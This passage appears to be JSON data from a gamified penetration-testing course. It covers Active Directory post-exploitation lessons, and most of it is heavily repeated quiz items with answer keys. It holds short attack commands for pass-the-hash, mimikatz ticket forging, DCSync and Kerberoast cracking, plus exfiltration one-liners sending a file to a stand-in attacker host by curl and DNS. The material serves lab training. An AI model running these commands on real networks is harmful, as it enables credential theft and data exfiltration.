encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"pth","cat":"Post-Exploitation","title":"Pass the Hash","diff":2,"xp":150,"intro":"Auth with NTLM hash.","sections":[{"type":"text","content":"Auth with NTLM hash."},{"type":"code","lang":"bash","content":"crackmapexec smb targets -u admin -H HASH\npsexec.py -hashes :HASH admin@target"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"PtH hash type?","opts":["SHA-256","NTLM","MD5","bcrypt"],"ans":1},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"ptt","cat":"Post-Exploitation","title":"Pass the Ticket","diff":3,"xp":200,"intro":"Use stolen Kerberos tickets.","sections":[{"type":"text","content":"Use stolen Kerberos tickets."},{"type":"code","lang":"bash","content":"mimikatz# sekurlsa::tickets /export\nmimikatz# kerberos::ptt ticket.kirbi"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"What is passed?","opts":["Password","TGT or TGS ticket","Certificate","Token"],"ans":1},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"kerb-roast","cat":"Post-Exploitation","title":"Kerberoasting Detail","diff":2,"xp":175,"intro":"Crack service accounts offline.","sections":[{"type":"text","content":"Crack service accounts offline."},{"type":"code","lang":"bash","content":"GetUserSPNs.py domain/user:pass -dc-ip DC -request\nhashcat -m 13100 hashes.txt rockyou.txt"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"TGS crackable because?","opts":["Unencrypted","Encrypted with service account password hash","Short","MD5"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"golden-tkt","cat":"Post-Exploitation","title":"Golden Ticket","diff":3,"xp":250,"intro":"Forge TGTs with krbtgt hash.","sections":[{"type":"text","content":"Forge TGTs with krbtgt hash."},{"type":"code","lang":"bash","content":"mimikatz# lsadump::dcsync /user:krbtgt\nmimikatz# kerberos::golden /user:fakeadmin /krbtgt:HASH /ptt"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Golden ticket power?","opts":["Speed","Impersonate ANY user indefinitely","Encrypted","MFA bypass"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"silver-tkt","cat":"Post-Exploitation","title":"Silver Ticket","diff":3,"xp":200,"intro":"Forge service tickets.","sections":[{"type":"text","content":"Forge service tickets."},{"type":"code","lang":"bash","content":"mimikatz# kerberos::golden /service:cifs /rc4:HASH /user:admin /ptt"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Silver vs golden?","opts":["Weaker","For specific service, not entire domain","Faster","Less access"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"dcsync","cat":"Post-Exploitation","title":"DCSync Attack","diff":3,"xp":250,"intro":"Replicate DC for all hashes.","sections":[{"type":"text","content":"Replicate DC for all hashes."},{"type":"code","lang":"bash","content":"mimikatz# lsadump::dcsync /all\nsecretsdump.py domain/admin:pass@DC"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"DCSync abuses?","opts":["Backup","Replicating Directory Changes","Schema Admin","DNS Admin"],"ans":1},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"data-exfil","cat":"Post-Exploitation","title":"Data Exfiltration","diff":2,"xp":150,"intro":"Extract data from networks.","sections":[{"type":"text","content":"Extract data from networks."},{"type":"code","lang":"bash","content":"curl -X POST -d @secret.txt https://attacker/exfil\nfor l in $(base64 secret.txt);do nslookup $l.attacker.com;done"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Why DNS exfil hard to detect?","opts":["Encrypted","DNS expected and unblocked","Fast","TCP"],"ans":1},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"c2-basics","cat":"Post-Exploitation","title":"C2 Frameworks","diff":2,"xp":150,"intro":"Command & Control.","sections":[{"type":"text","content":"Command & Control."},{"type":"code","lang":"bash","content":"# Sliver, Cobalt Strike, Mythic, Havoc\nsliver> generate --mtls --os windows"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"C2 stands for?","opts":["Code Control","Command and Control","Cyber Counter","Critical Comm"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and 